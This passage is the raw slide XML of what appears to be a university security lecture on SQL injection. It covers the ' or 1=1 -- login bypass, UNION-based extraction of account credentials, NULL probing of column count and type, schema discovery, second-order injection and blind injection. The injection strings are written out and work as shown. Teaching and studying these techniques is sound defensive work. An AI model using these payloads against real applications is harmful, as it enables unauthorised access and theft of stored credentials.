            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="183243442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8" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The ‘ or 1=1 -- Technique</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="948229" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By entering any user value and:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>‘ or 1=1 --</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1300" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as the password results in the string:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM users WHERE username = foo AND password = '' OR 1=1 -- '</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The conditional statement “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>password =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ''</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> OR 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” is true whether or not the password is correct</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The “--” makes sure that the rest of the SQL statement is interpreted as a comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="313948713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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Injecting SQL Into Different Types of Queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="563203" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL injection can modify any type of query such as</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT * FROM accounts WHERE user=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ AND pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>INSERT INTO accounts (user, pass) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>VALUES(‘${u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’, ‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Note that in this case one has to figure out how many values to insert</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UPDATE accounts SET pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>np</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ WHERE user= ‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ AND pass=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DELETE * FROM accounts WHERE user=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1266684589"/>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en-US"/>
              <a:t>Identifying SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="565251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A SQL injection vulnerability can be identified in different ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Negative approach: special-meaning characters in the query will cause an error (for example: user=“ ’ ”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Positive approach: provide an expression that would NOT cause an error (for example: “17+5” instead of “22”, or a string concatenation, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>such as “‘ ’Foo” instead of “Foo”) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1623939404"/>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a:t>The UNION Operator</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The UNION operator is used to merge the results of two separate queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In a SQL injection attack this can be exploited to extract information from the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Original query:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT id, name, price FROM products WHERE brand=‘${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Modified query passing ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ UNION…”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT id, name, price FROM products WHERE brand=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’ UNION SELECT user, pass, NULL FROM accounts -- ‘</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order for this attack to work the attacker has to know</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The structure of the query (number of parameters and types have to be compatible: NULL can be used if the type is not known)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The name of the table and columns   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1252286003"/>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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Determining Number and Type of </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Query Parameters</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="569347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The number of columns in a query can be determined using progressively longer NULL columns until the correct query is returned</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The type of columns can be be determined using a similar technique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, to determine the column that has a string type one would execute: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’, NULL, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’, NULL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UNION SELECT NULL, NULL, ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4208009763"/>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en-US"/>
              <a:t>Determining Table and Column Names</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="571395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To determine table and column names one has to rely on techniques that are database-specific</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MySQL and Microsoft SQL Server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> one can extract information about the tables and columns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Oracle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>all_tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> table one can extract information about the tables created for an application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="378382872"/>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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Second-Order SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="589827" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In a second-order SQL injection, the code is injected into an application, but the SQL statement is invoked at a later point in time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>e.g., Guestbook, statistics page, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Even if application escapes single quotes, second order SQL injection might be possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The attacker sets username to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>john’--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, application safely escapes value to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>john’’--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> when performing the query (note the two single quotes) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>At a later point, attacker requests to change password (and “sets” a new password for victim john instead):</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>update users set password= … where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>database_handle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(“username”)=‘john’--‘</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15085813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40" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1140741" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A typical countermeasure to SQL injection is to prohibit the display of error messages: However, a web application may still be vulnerable to blind SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Example: a news site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Press releases are accessed with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A SQL query is created and sent to the database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>select title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> where id=5;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>All error messages are filtered by the application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3980909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788" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Blind SQL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142789" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>How can we inject statements into the application and exploit it?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>We do not receive feedback from the application so we can use a trial-and-error approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>First, we try to inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressRelease.jsp?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>=5 AND 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The SQL query is created and sent to the database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>select title, description FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>pressReleases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> where id=5 AND 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
